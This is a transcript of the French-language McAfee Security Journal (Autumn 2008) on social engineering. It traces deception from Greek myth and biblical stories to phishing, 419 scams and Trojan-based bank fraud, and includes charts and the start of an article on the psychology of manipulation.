macafee security journal fr

48
CHEVAUX DE TROIE, fraude aux clics et promesses d'argent facile ne sont que quelques-unes des tactiques exploitées par les auteurs de logiciels malveillants pour piéger les internautes INGÉNIERIE SOCIALE La principale menace de sécurité au monde Point de vue sur la sécurité — par McAfee ® Avert ® Labs Automne 2008

Upload: libindi

Post on 25-Jun-2015

146 views

Category:

Documents


14 download

TRANSCRIPT

Page 1: MacAfee Security Journal Fr

CHEVAUX DE TROIE, fraude aux clics et promesses d'argent facile ne sont que quelques-unes des tactiques exploitées par les auteurs de logiciels malveillants pour piéger les internautes

INGÉNIERIE SOCIALELa principale menace de sécurité au monde

Point de vue sur la sécurité — par McAfee® Avert® Labs Automne 2008

Page 2: MacAfee Security Journal Fr

McAfee Security Journal Automne 2008

Rédacteur en chefDan Sommer

RédactionAnthony BettiniHiep DangBenjamin EdelmanElodie GrandjeanJeff GreenAditya KapoorRahul KashyapMarkus JacobssonKarthik RamanCraig Schmugar

StatistiquesToralv DirroShane KeatsDavid MarcusFrançois PagetCraig Schmugar

IllustrateurDoug Ross

GraphismePAIR Design, LLC

RemerciementsDe nombreuses personnes ont contribué à la création de ce numéro de McAfee Security Journal. Nous tenons à tous les remercier et profitons de l'occasion pour saluer nommément nos principaux contributeurs : les cadres dirigeants de McAfee, Inc. et McAfee Avert Labs qui ont encouragé et soutenu la création de ce journal ; nos réviseurs Carl Banzhof, Hiep Dang, David Marcus, Craig Schmugar, Anna Stepanov et Joe Telafici ; nos auteurs, leurs supérieurs et collègues qui les ont assistés par leurs idées et commentaires ; les experts en marketing Cari Jaquet, Mary Karlton, Beth Martinez et Jennifer Natwick ; notre chargé de relations publiques Joris Evers et son équipe internationale, ainsi que Red Consultancy Ltd. ; notre agence de graphisme Pair Design ; notre imprimeur RR Donnelley ; Derrick Healy et ses collègues du bureau de localisation de Cork en Irlande, qui ont traduit cette publication dans de nombreuses langues. Cette publication n'aurait pas été possible sans leur inestimable contribution.

Dan SommerRédacteur en chef

Vous avez apprécié ce numéro ? Certaines choses vous ont déplu ? Envoyez-nous vos commentaires par e-mail à l'adresse [email protected].

Sommaire

4 Les origines de l'ingénierie sociale Du cheval de Troie de l'Odyssée au phishing sur Internet : la tromperie à l'épreuve du temps Hiep Dang

9 Demandez et vous recevrez Les raisons psychologiques du succès de l'ingénierie sociale Karthik Raman

13 L'ingénierie sociale sur le Web : que nous réserve l’avenir ? La fraude aux clics compte sans doute parmi les menaces auxquelles nous devrons faire face à l'avenir. Markus Jakobsson

16 Les Jeux Olympiques de Pékin : une cible de choix pour les logiciels d'ingénierie sociale A l'instar d'autres événements marquants, les JO sont un terrain de jeu irrésistible pour les auteurs de malwares. Elodie Grandjean

22 Les vulnérabilités des marchés boursiers Les pirates peuvent-ils s'enrichir grâce aux correctifs de Microsoft et à la falsification de l'actualité de sociétés ? Anthony Bettini

28 L'avenir des sites de réseau social Les sommes d'argent colossales en jeu et le nombre croissant d'inscrits font des sites de réseau social une cible alléchante pour les auteurs de logiciels malveillants. Craig Schmugar

31 Le nouveau souffle des vulnérabilités Les techniques d'ingénierie sociale exposent les utilisateurs aux failles béantes des logiciels. Rahul Kashyap

34 Typosquatting: les itinéraires inattendus de la navigation sur Internet L'internaute peu attentif doit s'attendre à l'inattendu. Benjamin Edelman

38 Qu'est-il donc arrivé aux logiciels espions et aux logiciels publicitaires ? Un renforcement de la législation a peut-être permis de dompter les logiciels espions, mais les programmes potentiellement indésirables et les chevaux de Troie n'ont pas dit leur dernier mot. Aditya Kapoor

44 Statistiques Quel niveau de risque pour les domaines de premier niveau ? David Marcus

Page 3: MacAfee Security Journal Fr

AUTOMNE 2008 3

Nous sommes heureux de vous présenter le premier numéro de McAfee Security Journal. En réalité, il ne s'agit pas à strictement parler d'un premier numéro, puisque nous avons rebaptisé la publication intitulée, suivant les pays, McAfee Sage/Global Threat Report — en français, Point global sur les menaces. Notre McAfee Security Journal présente le même point de vue sans détour et le même contenu dynamique que vous attendez désormais des meilleurs chercheurs et auteurs dans le domaine de la sécurité informatique : les experts de McAfee® Avert® Labs. Dans ce numéro, nous nous pencherons sur le vecteur de menaces le plus insidieux et répandu : l'ingénierie sociale.

Pour un Tibet libre ! Nouvelles images de la 3e guerre mondiale ! Les meilleures astuces pour évader le fisc ! Nouvelles technologies pour économiser l'énergie ! Achetez des médicaments bon marché en ligne !

La liste est loin d'être exhaustive, mais les exemples illustrent bien notre propos. Pour parvenir à leurs fins, les auteurs de logiciels malveillants (malwares) et les spécialistes de l'usurpation d'identité doivent créer des messages attirants et efficaces, bien plus que par le passé. Les arnaques par ingénierie sociale, toutefois, sont loin de constituer une nouveauté. Elles sont aussi vieilles que la communication humaine elle-même. « Tu possèdes une chose que je convoite. Je vais essayer de te convaincre de me la donner ou d'agir comme je le souhaite. » L'ingénierie sociale est probablement la menace la plus difficile à contrer en raison du facteur humain. La façon la plus facile de dérober les informations d'identité d'une personne est sans doute de lui demander tout simplement de vous les fournir.

Les techniques d'ingénierie sociale (qu'il s'agisse de chaînes de Ponzi, de systèmes de pyramides, d'impostures, d'escroqueries, de phishing ou de spam) se conforment toutes à un même modèle. Certaines de ces attaques sont physiques, d'autres numériques, mais elles ont toutes des éléments en commun. Elles poursuivent le même objectif et utilisent souvent les mêmes techniques. Elles visent toutes à manipuler leurs victimes en exploitant une faiblesse de la nature humaine, Elles créent des scénarios conçus pour persuader la victime de dévoiler des informations ou d'accomplir une action.

Pour la rédaction de ce numéro, nous avons fait appel à d'éminents chercheurs et auteurs afin qu'ils analysent et illustrent ce thème à votre intention. Ce numéro constitue en outre une véritable première puisque des contributeurs invités ont également participé à sa création. Remercions donc à cet égard deux noms prestigieux : Markus Jacobsson du Palo Alto Research Center et Benjamin Edelman, professeur à la Harvard Business School.

Nous commencerons par nous pencher sur le passé, avec un bref exposé sur la tromperie à travers les âges. Ensuite, nous examinerons les éléments de psychologie qui expliquent la réussite de l'ingénierie sociale. Notre troisième article se projettera dans l'avenir et envisagera l'évolution probable de l'ingénierie sociale au cours des prochaines années. Au lendemain des Jeux Olympiques 2008 de Pékin, nous analyserons les stratagèmes encore une fois imaginés par les auteurs de logiciels malveillants pour amener les amateurs de sport à visiter des sites web factices. Est-il possible de gagner en bourse en tablant sur des événements tels que le jour de diffusion des correctifs mensuels Microsoft ou en créant de faux articles d'actualité d'entreprises ? Nos recherches de pointe ont permis de répondre à ces questions. Quel est l'avenir des sites de réseau social ? Leur sécurité sera-t-elle renforcée, ou sont-ils voués à rester des proies faciles à cause de la trop grande crédulité de leurs utilisateurs ? Nous nous pencherons aussi sur la façon dont les auteurs de logiciels malveillants tirent parti des vulnérabilités des logiciels et du typosquatting, qui consiste à exploiter les fautes de frappe dans les requêtes de page web. Notre dernier article fournit un aperçu historique des logiciels publicitaires (adwares) et des logiciels espions (spywares). Enfin, diverses statistiques vous permettront d'apprécier les différents degrés de risque auxquels sont exposés les domaines de premier niveau de par le monde.

Nous espérons que vous trouverez ce numéro aussi captivant et propice à la réflexion qu'il l'a été pour nous. Merci de vous joindre à nous pour explorer les arcanes de la sécurité informatique.

Jeff Green est Vice-Président directeur de McAfee Avert Labs et du département Développement de produits. Il est responsable à l'échelle mondiale de tous les centres de recherche de McAfee, établis sur les continents américain, européen et asiatique. Jeff Green est à la tête des équipes de recherche sur les différents types de menaces (virus, attaques ciblées et par piratage, logiciels espions, spam et attaques par phishing), sur les vulnérabilités et les patches, ainsi que sur les technologies de détection et de prévention des intrusions sur l'hôte et sur le réseau. Il dirige également la recherche à long terme, qui permet à McAfee de conserver une longueur d'avance sur les menaces émergentes.

Les débuts du journal de la sécurité McAfeeJeff Green

Page 4: MacAfee Security Journal Fr

4 McAFEE SECURITY JOURNAL

Rendue populaire par Kevin Mitnick (sans doute le plus tristement célèbre représentant de l'ingénierie sociale de l'ère informatique moderne), l'ingénierie sociale est l'art de persuasion ultime : elle tente de convaincre les individus de dévoiler des informations confidentielles et d'agir d'une certaine manière. Bien que cette expression « ingénierie sociale » soit contemporaine, ses techniques et philosophies sous-jacentes existent depuis l'aube de l'humanité. Des récits de tromperie et de manipulation se retrouvent dans l'histoire, le folklore, la mythologie, la religion et la littérature.

Prométhée : dieu de l'ingénierie sociale ?

D'après la mythologie grecque, le talent des hommes pour l'ingénierie sociale leur vient probablement de Prométhée, qui était tellement versé dans cet art qu'il parvint à tromper Zeus lui-même. Dans la Théogonie et Les travaux et les jours, le poète épique Hésiode raconte l'histoire de Prométhée, un Titan connu pour sa ruse et ses fourberies. Selon la légende, il aurait par ailleurs créé l'Homme à partir d'une motte d'argile. Prométhée fit une démonstration célèbre de sa ruse à Mécone, en offrant à Zeus un choix pour régler un différend opposant les dieux et les mortels. L'une des offrandes proposées était un estomac de bœuf rempli de viande ; l'autre était constituée des os de l'animal recouverts d'une graisse épaisse. La première était donc de la nourriture sous le couvert d'une enveloppe répugnante, tandis que l'autre était immangeable mais rendue attirante par une apparence alléchante. Zeus choisit la seconde offrande : les hommes purent ainsi se contenter d'offrir aux dieux des sacrifices faits d'os et de graisse, et garder la viande pour eux. Zeus, furieux d'avoir été trompé par Prométhée, punit les mortels en leur refusant le feu. Mais, au cours d'un autre épisode

d'ingénierie sociale, Prométhée se joua à nouveau de Zeus et lui « ayant dérobé une portion splendide du feu inextinguible, qu'il cacha dans une férule creuse » à partir du Mont Olympe, il le remit aux mortels. En guise de punition, Prométhée fut enchaîné à un rocher et condamné à voir chaque jour un aigle se repaître de son foie, lequel renaissait nuit après nuit. Zeus infligea également un châtiment aux hommes : il créa la première femme, Pandore, et avec elle, une jarre. Piquée par la curiosité, elle ouvrit cette dernière, qui libéra sur-le-champ d'innombrables maux.

L'attaque par phishing, selon Jacob et RebeccaL'Ancien Testament nous conte l'histoire de Jacob et de sa mère, Rebecca. Ceux-ci eurent recours à une technique d'ingénierie sociale qui a jeté les bases des attaques par phishing modernes, où la victime pense être abordée par quelqu'un d'autre que l'auteur de l'attaque. Isaac, père de Jacob et époux de Rebecca, devint aveugle à la fin de sa vie. Alors qu'il se préparait à la mort, il demanda à son aîné, Esaü : « chasse-moi du gibier, fais-moi un mets comme j'aime, et apporte-le-moi à manger, afin que mon âme te bénisse avant que je meure ». (Genèse 27:2–4) Souhaitant que Jacob reçoive la bénédiction d'Isaac à la place d'Esaü, Rebecca mit au point un plan. Jacob fut d'abord hésitant : « Esaü, mon frère, est velu, et je n'ai point de poil. Peut-être mon père me touchera-t-il, et je passerai à ses yeux pour un menteur, et je ferai venir sur moi la malédiction, et non la bénédiction. » (Genèse 27:11–12) Pour tromper Isaac en lui faisant croire qu'il était aux côtés d'Esaü, Rebecca prépara le repas d'Isaac, para Jacob des plus beaux atours d'Esaü et attacha une peau de chèvre aux mains et au cou glabres de Jacob. Ce dernier apporta le mets à Isaac, passa le test d'authentification et reçu la bénédiction qui revenait à Esaü.

A l'heure actuelle, il est rare de lire un article d'actualité ou un ouvrage consacré à la sécurité informatique sans tomber plusieurs fois sur l'expression ingénierie sociale.

Les origines de l'ingénierie socialeHiep Dang

Page 5: MacAfee Security Journal Fr

AUTOMNE 2008 5

Samson et Dalila : espionnage sous contratSamson était un personnage biblique d'une force extraordinaire qui combattit les Philistins. Le secret de sa puissance résidait dans sa longue chevelure. Alors qu'il était à Gaza, Samson tomba amoureux de Dalila. Mais les Philistins parvinrent à convaincre la belle de leur dévoiler le secret de la force de Samson en lui offrant 1 100 pièces d'argent. « Flatte-le, pour savoir d'où lui vient sa grande force et comment nous pourrions nous rendre maîtres de lui ; nous le lierons pour le dompter, et nous te donnerons chacun mille et cent sicles d'argent. » (Juges 16:5) Samson résista avant de succomber à la force persuasive de Dalila et finit par lui révéler son secret. Elle lui dit : « Comment peux-tu dire : Je t'aime ! puisque ton cœur n'est pas avec moi ? Voilà trois fois que tu t'es joué de moi, et tu ne m'as pas déclaré d'où vient ta grande force. » Comme chaque jour, elle tourmentait et l'importunait par ses questions, il finit par abandonner toute résistance, et lui dit : « Le rasoir n'a point passé sur ma tête ; parce que je suis consacré à Dieu dès le ventre de ma mère. Si j'étais rasé, ma force m'abandonnerait ; je deviendrais faible, et je serais comme tout autre homme. » (Juges 16:15-17) Peu après qu'il tomba endormi, Dalila exploita sa vulnérabilité en lui rasant les cheveux. Les Philistins profitèrent de la faiblesse de Samson pour lui crever les yeux et l'enchaîner, puis le condamnèrent à la prison à vie.

Le premier cheval de Troie Rendu célèbre par deux poètes épiques, le Grec Homère dans son Odyssée et le Romain Virgile dans son Enéide, l'épisode du cheval de Troie fut l'une des ruses d'ingénierie sociale les plus habiles de l'histoire de l'humanité. Au cours de la Guerre de Troie, les Grecs ne parvenaient pas à renverser les murailles qui entouraient la cité troyenne. Astucieux, le guerrier grec Ulysse mit au point une ruse pour leurrer les Troyens en leur faisant croire que les Grecs avaient cessé leur assaut de la ville. Les bateaux de la flotte hellène quittèrent les côtes, et seuls un grand cheval de bois et un soldat grec nommé Sinon restèrent sur la plage. Après avoir été capturé par les Troyens, Sinon leur raconta que les Grecs avaient laissé un immense cheval de bois en guise d'offrande aux dieux, afin que ces derniers les protègent lors de leur voyage de retour, et qu'ils l'avaient fait gigantesque pour qu'il ne puisse pas être emmené à Troie, sans quoi ils risquaient de s'attirer le mauvais sort. La tentation était trop grande pour les Troyens, qui trainèrent le majestueux animal à l'intérieur de leurs murs et ce, malgré les avertissements de Cassandre, condamnée à prononcer des prophéties toujours vraies mais auxquelles personne ne croirait jamais, et ceux de Laocoön, prêtre troyen, qui s'exclamait dans l'Enéide :

Le manque de discernement des Troyens précipita leur chute. Cette nuit-là, sous le commandement d'Ulysse, les soldats grecs dissimulés dans le cheval tuèrent les gardes et ouvrirent les portes de la ville au reste de leur armée. Grâce à l'habile tactique d'ingénierie sociale mise au point par Ulysse, les Grecs eurent raison des Troyens et gagnèrent la guerre.

Le cheval de Troie d'aujourd'huiLorsqu'Ulysse ourdit son plan d'infiltration de Troie, il ne s'attendait pas à créer un précédent pour les millénaires à venir. De nos jours, le type de logiciel malveillant (malware) le plus répandu dans le monde, le « cheval de Troie » électronique, a été baptisé ainsi par Daniel Edwards de la National Security Agency (NSA) durant les années 1970, en référence à la technique d'ingénierie sociale utilisée par les Grecs. Avant l'ère d'Internet, les utilisateurs qui souhaitaient partager des fichiers recouraient pour cela à des supports physiques (tels que disquettes ou lecteurs de bande) ou se connectaient à des systèmes d'information télématiques (BBS). Les pirates informatiques ont vite réalisé qu'ils pouvaient les inciter à exécuter du code malveillant en donnant à ce dernier l'apparence d'un jeu ou d'un utilitaire. La simplicité et l'efficacité incroyable des chevaux de Troie font que les auteurs de logiciels malveillants ont encore recours à cette technique d'ingénierie sociale plusieurs décennies plus tard. Aujourd'hui, le nombre d'utilisateurs de PC qui, tombant dans les multiples pièges tendus, se laissent infecter par des chevaux de Troie croît de façon alarmante : ils ne peuvent résister à de la musique, des vidéos et des logiciels gratuits, ou encore aux cartes de vœux électroniques de personnes qu'ils ne connaissent pourtant ni d'Eve ni d'Adam.

« 0 Troie ! ô ville malheureuse ! Citoyens insensés, que faites-vous ?Croyez-vous qu'en effet les Grecs soient loin de nous,Que même leurs présents soient exempts d'artifice ?Ignorez-vous leur fourbe, ignorez-vous Ulysse ?Ou les Grecs sont cachés dans ces vastes contours ?Ou ce colosse altier, qui domine nos tours,vient observer Pergame ; ou l'affreuse machine,De nos murs imprudents médite la ruine.Craignez les Grecs, craignez leurs présents désastreux :Les dons d'un ennemi sont toujours dangereux. »

Page 6: MacAfee Security Journal Fr

6 McAFEE SECURITY JOURNAL

Une escroquerie remise au goût du jour

La fraude nigériane, également appelée fraude 419, existe depuis plusieurs décennies et demeure l'un des types de spam les plus prolifiques. Le nombre « 419 » fait référence à la section du code pénal nigérian qui condamne cette arnaque. Cette tactique d'ingénierie sociale qui mise sur la promesse d'argent facile se présente sous la forme de lettres, dont les premières ont été remises dans des boîtes aux lettres postales au cours des années 1970. L'escroquerie a ensuite évolué : les télécopies non sollicitées envoyées durant les années 1980 ont cédé la place aux e-mails, qui constituent la méthode de propagation presque exclusivement utilisée de nos jours. L'origine de cette tromperie remonte au 16e siècle ; elle était alors nommée « arnaque du prisonnier espagnol ». Le procédé est simple : on jouait sur la naïveté de la victime en prétendant qu'un prisonnier espagnol

extrêmement fortuné avait besoin d'aide pour être libéré. Le soi-disant détenu comptait sur l'auteur de la supercherie afin de récolter suffisamment d'argent pour être relaxé. L'arnaqueur abordait la victime et lui « offrait la possibilité » de participer à la collecte de fonds, avec la promesse de réaliser d'importants gains financiers. De nos jours, la lettre compte de nombreuses variantes mais le concept demeure le même. La fraude nigériane vise à faire miroiter des gains mirobolants pour un « investissement » des plus modiques. Bien que la plupart des destinataires de la lettre se rendent compte que l'offre est trop belle pour être vraie, on estime que 1 % d'entre eux y répondent. D'après les services secrets américains, les arnaqueurs parviennent ainsi à extorquer à leurs victimes cent millions de dollars en moyenne par an.

Figure 1 : La fréquence de publication de fichiers de signatures de McAfee destinés spécifiquement aux logiciels malveillants et aux programmes potentiellement indésirables a connu plusieurs pics cette dernière décennie. En 1998, les générateurs de virus ont fait leur apparition. Entre 2003 et 2004, les mass-mailers se sont répandus. Entre 2004 et 2005, les réseaux de robots (botnets) étaient en hausse. Et entre 2006 et 2007, les chevaux de Troie ont connu une croissance fulgurante. 0

10

1997 1998 1999 2000 2001 2002 2003 2004 2005 2006 2007

Virus et robots

Chevaux de Troie

Programmes potentiellement indésirables

20

30

40

50

60

70

80

90

100

110

120

130

140

Croissance des logiciels malveillants et des programmes potentiellement indésirables (PUP)

Familles, de 1997 à 2007 en milliers

Page 7: MacAfee Security Journal Fr

AUTOMNE 2008 7AUTOMNE 2008 7

Figure 2 : Les tentatives de phishing signalées augmentent de façon constante, mais le nombre de nouveaux sites de phishing a littéralement explosé ces deux dernières années. (Source : Anti-Phishing Working Group)

Tentatives de phishing individuelles signalées

Nouveaux sites de phishing

Tentatives de phishing signalées

En milliers

0

10

Nov. 2003

Mai 2004

Nov. 2004

Mai 2005

Nov. 2005

Mai 2006

Nov. 2006

Mai 2007

Nov. 2007

20

30

40

50

60

Phishing

Le terme « phishing » (hameçonnage) est une invention des pirates informatiques. Il a été forgé par analogie avec le terme anglais « fishing » (qui signifie « pêche ») du fait que la technique d'ingénierie sociale utilise un leurre pour amener les victimes à dévoiler leurs noms d'utilisateur, mots de passe, numéros de carte de crédit et autres informations personnelles. Dans les années 1990, de nombreux pirates informatiques ont exploité les offres d'essai gratuites de services Internet d'AOL (America Online) en utilisant des numéros de carte de crédit factices, générés automatiquement, qui en réalité ne correspondaient pas aux comptes existants. Après qu'AOL a renforcé ses mécanismes de sécurité et amélioré ses tests de validation des cartes de crédit pour garantir la légitimité des

numéros, les escrocs ont commencé à rechercher des noms d'utilisateur et mots de passe réels pour attaquer les réseaux du fournisseur de services. Ils se sont mis à envoyer de faux e-mails et messages instantanés semblant provenir du support technique d'AOL. De nombreuses victimes peu méfiantes ont révélé leurs informations de compte, et les activités et achats réalisés par les pirates à l'aide de leurs comptes compromis leur ont été facturés. Ces malfaiteurs n'ont pas mis longtemps à se rendre compte des plantureux profits à la clé et du taux de réussite de ce type d'attaque : ils se sont mis à cibler des sociétés (banques, eBay, Amazon et d'autres) spécialisées dans les transactions et le commerce en ligne.

Page 8: MacAfee Security Journal Fr

8 McAFEE SECURITY JOURNAL

L'histoire se répète

Quel que soit le terme employé — ingénierie sociale, tromperie, escroquerie, exploitation des biais cognitifs ou arnaque —, le procédé qui vise à abuser de la naïveté et de la confiance d'un individu est vieux comme le monde. Les experts en sécurité s'accordent à dire que l'homme est le maillon faible de la chaîne de la sécurité. Nous pouvons développer les logiciels les plus sûrs pour protéger les ordinateurs, mettre en œuvre les stratégies de sécurité les plus restrictives ou déployer tous les efforts possibles pour sensibiliser les utilisateurs : tant que nous agirons sous le coup de la curiosité et de la cupidité, sans tenir compte des conséquences éventuelles, nous risquons de revivre un nouveau cauchemar semblable à la tragédie du cheval de Troie.

Le progrès ne tient pas au changement : il dépend de la capacité à le rendre durable. Quand le changement est absolu, il ne reste plus aucune possibilité d'amélioration et aucune orientation d'amélioration n'est définie : et quand les leçons tirées de l'expérience ne sont pas retenues, comme parmi les sauvages, l'enfance perdure. Ceux qui ne peuvent pas se souvenir du passé sont condamnés à le répéter. — George Santayana, volume « Reason in Common Sense » de « The Life of Reason »

OUVRAGES CITÉS Anderson J.P., Computer Security Technology Planning Study, vol. II (Etude sur la planification des technologies de sécurité informatique), US Air Force, 1972

Farquhar M., A Treasury of Deception (Histoire de la tromperie), New York, The Penguin Group

Hésiode, Théogonie (traduction de C. M. Leconte de Lisle, 1869) Hésiode, Les travaux et les jours (traduction de C. M. Leconte de Lisle, 1869)

Hiep Dang est Directeur des recherches sur la lutte contre les logiciels malveillants au sein de McAfee Avert Labs. Il est chargé de la coordination de l'équipe mondiale des experts en logiciels malveillants de McAfee, spécialisés dans la recherche sur les attaques de malwares (notamment les virus, les vers, les chevaux de Troie, les robots et les logiciels espions), leur analyse et l'élaboration de réponses. M. Dang contribue régulièrement à la rédaction des livres blancs et des articles de blog d'Avert Labs, et il participe également à la rédaction de McAfee Security Journal. Il a été interviewé par le Wall Street Journal, MSNBC, PC Magazine, et de nombreuses autres publications et médias au sujet des tendances des menaces et programmes malveillants. Hiep Dang est également un fervent pratiquant du Tai Chi et du Kung Fu du style de la mante religieuse ou Tang Lang Quan. Il a actuellement mis entre parenthèses ses séances d'entraînement pour focaliser ses énergies sur la sécurité informatique.

Homère, L'Odyssée, (traduction de C. M. Leconte de Lisle) Mitnick K., The Art of Deception (L'art de la supercherie), Indianapolis, Wiley Publishing Myers M. J., Phishing and Countermeasures (Phishing et contremesures), John Wiley & Sons, Inc., 2007

Santayana G., The Life of Reason (La vie de la raison), 1905 Virgile, L'Enéide, 19 av. J.-C. (traduction de Jacques Delille)

Sécurité informatique : petite perspective historique

Figure 3 : Chronologie des événements marquants de l'ingénierie sociale

John von Neumann publie sa théorie des automates autoréplicateurs.

Frederick Cohen publie l'ouvrage « Experiments with Computer Viruses » (Expériences sur les virus informatiques) et attribue à Leonard Adleman l'invention du terme « virus informatique ».

Aujourd'hui, McAfee Avert Labs garantit une protection contre les virus, les vers, les chevaux de Troie, les logiciels espions, les programmes potentiellement indésirables, l'exploitation des vulnérabilités, le spam, le phishing, les domaines malveillants, ainsi que les intrusions sur l'hôte et le réseau.

Creeper (le premier virus informatique) est déployé sur le réseau ARPANET.

La première attaque par phishing est lancée pour dérober les mots de passe des utilisateurs AOL.

Internet est constitué à partir d'ARPANET.

Le film « War Games » montre à l'écran les conséquences du piratage informatique.

Le spam, ou courrier non sollicité, apparaît peu après qu'Internetdevient accessible au grand public.

Les chevaux de Troie font leur apparition sur les BBS.

Le premier système d'information télématique(BBS) est mis au point.

Kevin Mitnick publie « The Art of Deception » (L'art de la tromperie), qui décrit ses talents en matière d'ingénierie sociale.

Brain (le premier virus sur PC) apparaît.

Elk Cloner (le premier virus sur Apple) est mis en circulation.

Le ver Morris (le premier ver à se répliquer automatiquement) fait son apparition.

John Draper (surnommé Captain Crunch) découvre qu'un sifflet offert en cadeau dans une boîte de céréales peut être utilisé pour pirater des réseaux téléphoniques (phreaking).

Les termes « spyware » (logiciel espion) et « adware » (logiciel publicitaire) commencent à se répandre.

ARPANET (précurseur d'Internet) est créé.

McAfee Avert Labs devient la première équipe d'intervention d'urgence contre les virus à l'échelle mondiale.

La messagerie électronique est créée.

1948 1978 1980 1982 1983 1984 1986 1988 1995 1996 2000 2002197119691965 2008

Page 9: MacAfee Security Journal Fr

AUTOMNE 2008 9

Les clients de Nordea ont reçu un e-mail semblant provenir de la banque, et 250 d'entre eux ont téléchargé puis installé le soi-disant logiciel « antispam » préconisé par l'e-mail. En réalité, ce logiciel n'était autre qu'un cheval de Troie qui collectait des informations sur les clients, à l'aide desquelles les escrocs se connectaient au site web de la banque pour ensuite vider les comptes bancaires1.

Selon un principe de sécurité bien connu, l'homme est le maillon faible de tout système de sécurité. Bien que les attaques de sécurité et les mécanismes de défense développés pour y faire face ne cessent d'évoluer, la nature humaine quant à elle ne change pas. Une attaque par ingénierie sociale est bien plus efficace et se révèle lucrative plus rapidement pour son auteur qu'une attaque en force, qui l'oblige à craquer des algorithmes de chiffrement, à dénicher de nouvelles vulnérabilités logicielles ou à inventer des logiciels malveillants toujours plus complexes. Lors de la fraude perpétrée contre Nordea, il a été plus simple pour les malfaiteurs d'inviter les clients de la banque à installer un cheval de Troie que de forcer un coffre-fort pour y dérober de l'argent.

Notre crédulité, notre cupidité et notre curiosité nous rend facilement manipulables, et l'ingénierie sociale exploite précisément nos sentiments et notre manière de penser. Les spécialistes en ingénierie sociale demandent des renseignements ou invitent l'utilisateur à effectuer une action, et bien souvent, ils font mouche. Mais pourquoi ?

Lors de ses travaux précurseurs sur la psychologie de la sécurité, l'expert de renom Bruce Schneier a identifié quatre pôles de recherche : l'économie comportementale, la psychologie de la décision, la psychologie du risque et la neuroscience. Ceux-ci permettent d'expliquer plus facilement les raisons pour lesquelles notre perception de la sécurité diverge de la réalité2. Ce numéro de McAfee Security Journal et cet article en particulier se concentrent sur l'un des aspects de la sécurité : l'ingénierie sociale. Notre analyse portera sur la neuroscience, la psychologie de la décision et des notions élémentaires de psychologie sociale, afin de déterminer comment les individus ne perçoivent pas la manipulation et tombent dans les pièges de l'ingénierie sociale.

Deux cerveaux en unSelon certains, le cerveau de l'Homme est le système le plus complexe présent dans l'univers. Cela est dû en partie à la complexité de sa structure et des interactions entre ses sous-systèmes extrêmement intriqués.

Dans le cerveau, les émotions semblent émaner de zones internes et anciennes, telles que l'amygdale, alors que le raisonnement est contrôlé par des parties externes, plus récentes, telles que le néocortex3. Toutefois, les sièges des émotions et de la raison ne s'excluent pas mutuellement, comme Isaac Asimov le souligne dans son livre The Human Brain4 :

Il semblerait que les émotions n'émanent pas d'une quelconque partie minuscule du cerveau, mais bien de plusieurs zones, notamment les lobes frontal et temporal du cortex, par un mécanisme complexe d'actions réciproques.

Les parties du cerveau qui gèrent l'émotion et la raison peuvent parfois collaborer ou être en conflit. C'est pourquoi nous éprouvons des difficultés à dissocier l'émotion de la raison, et pourquoi la première l'emporte facilement sur la seconde lorsque les deux s'opposent.

Voyons à présent comment nous gérons la peur par exemple. Lors de son analyse de nos réactions face à un danger imminent, l'auteur scientifique Steven Johnson précise que la réponse à la peur s'effectue selon « une combinaison harmonieuse d'instruments physiologiques qui interviennent avec une précision et une rapidité remarquables5 :

En langage courant, nous appelons cette réaction « le combat ou la fuite ». La sensation de sa manifestation est l'une des meilleures façons de prendre conscience que le cerveau et le corps peuvent opérer comme un système autonome, en toute indépendance de la volonté consciente.

En janvier 2007, des cybercriminels ont eu recours à des tactiques d'ingénierie sociale pour réaliser la plus grosse arnaque en ligne de tous les temps, dérobant près de 900 000 euros (1,1 million de dollars) aux clients de la banque suédoise Nordea.

Demandez et vous recevrezKarthik Raman

Page 10: MacAfee Security Journal Fr

10 McAFEE SECURITY JOURNAL

Lorsque nous revivons la situation ayant entraîné le combat ou la fuite par le passé, nous laissons la réponse émotionnelle reprendre le contrôle, bien que notre raison nous pousse objectivement à rejeter son bien-fondé.

Les politiciens malhonnêtes, les espions et les escrocs savent que jouer sur l'émotion — en particulier sur la peur — pour susciter une réaction affective est un moyen très efficace de parvenir à leurs fins. L'ingénierie sociale s'inscrit dans cette optique.

Théories au sujet de l'ingénierie socialeManipulation des émotions

De nombreux virtuoses de l'ingénierie sociale exercent une manipulation mentale, en tirant parti de la peur, la curiosité, la cupidité et l'empathie de leurs proies. Il est établi qu'il s'agit là de sentiments universels : nous les éprouvons tous un jour ou l'autre.

La peur et la curiosité sont utiles dans de nombreuses situations. Par exemple, la peur nous incite heureusement à nous échapper d'un immeuble en feu. Quant à la curiosité, elle peut nous pousser à nous lancer des défis et à chercher à en apprendre toujours davantage. Cependant, lorsque nos actes sont dictés par la peur ou la curiosité, leurs conséquences peuvent être indésirables voire dangereuses6.

Certaines attaques exploitant l'ingénierie sociale peuvent être lancées même sans que leur auteur ne soit présent sur les lieux pour exploiter la curiosité des victimes potentielles. En avril 2007, des clés USB infectées par un cheval de Troie ciblant les banques avaient été déposées dans un parking londonien. Les curieux désireux de connaître le contenu de ces clés — et probablement ravis de prendre gratuitement possession d'un périphérique de stockage — ont branché celles-ci à leurs ordinateurs, avec pour seul résultat de voir ce dernier infecté par un logiciel malveillant7.

Les auteurs d'attaques qui menacent ou font chanter leurs victimes exploitent leur peur. Le cheval de Troie GPCoder.i, qui a fait son apparition en juin 2008, est un exemple de logiciel malveillant qui instille la peur : après avoir chiffré des fichiers des utilisateurs, il exige de ces derniers une rançon pour déchiffrer leurs fichiers8. De même, les auteurs d'attaques qui soudoient leurs victimes exploitent leur cupidité, et ceux qui prétendent rechercher de l'aide, leur empathie.

Distorsions dans les raccourcis mentaux

Les experts en ingénierie sociale font parfois appel à des éléments extérieurs au registre émotionnel. Ils s'efforcent de saboter nos règles mentales de traitement de l'information, que nous appelons heuristique, ou règles empiriques.

Il faut bien l'admettre : notre heuristique présente certaines failles, certes, mais nous ne pouvons pas fonctionner sans elle. Nos vies seraient trop compliquées si nous devions réfléchir longuement à chaque perception, chaque propos, chaque action. Nous avons désespérément besoin de nos raccourcis mentaux. Le psychologue Robert Cialdini l'explique de la façon suivante9 :

Il ne faut nullement nous attendre à pouvoir reconnaître et analyser tous les aspects de chaque individu, événement et situation que nous rencontrons au quotidien. Nous n'en avons ni le temps, ni l'énergie, ni la capacité. Nous devons par contre souvent recourir à nos stéréotypes, nos règles empiriques, pour classer les choses selon quelques caractéristiques clés, afin de réagir spontanément lorsque l'un ou l'autre de ces éléments déclencheurs se présentent.

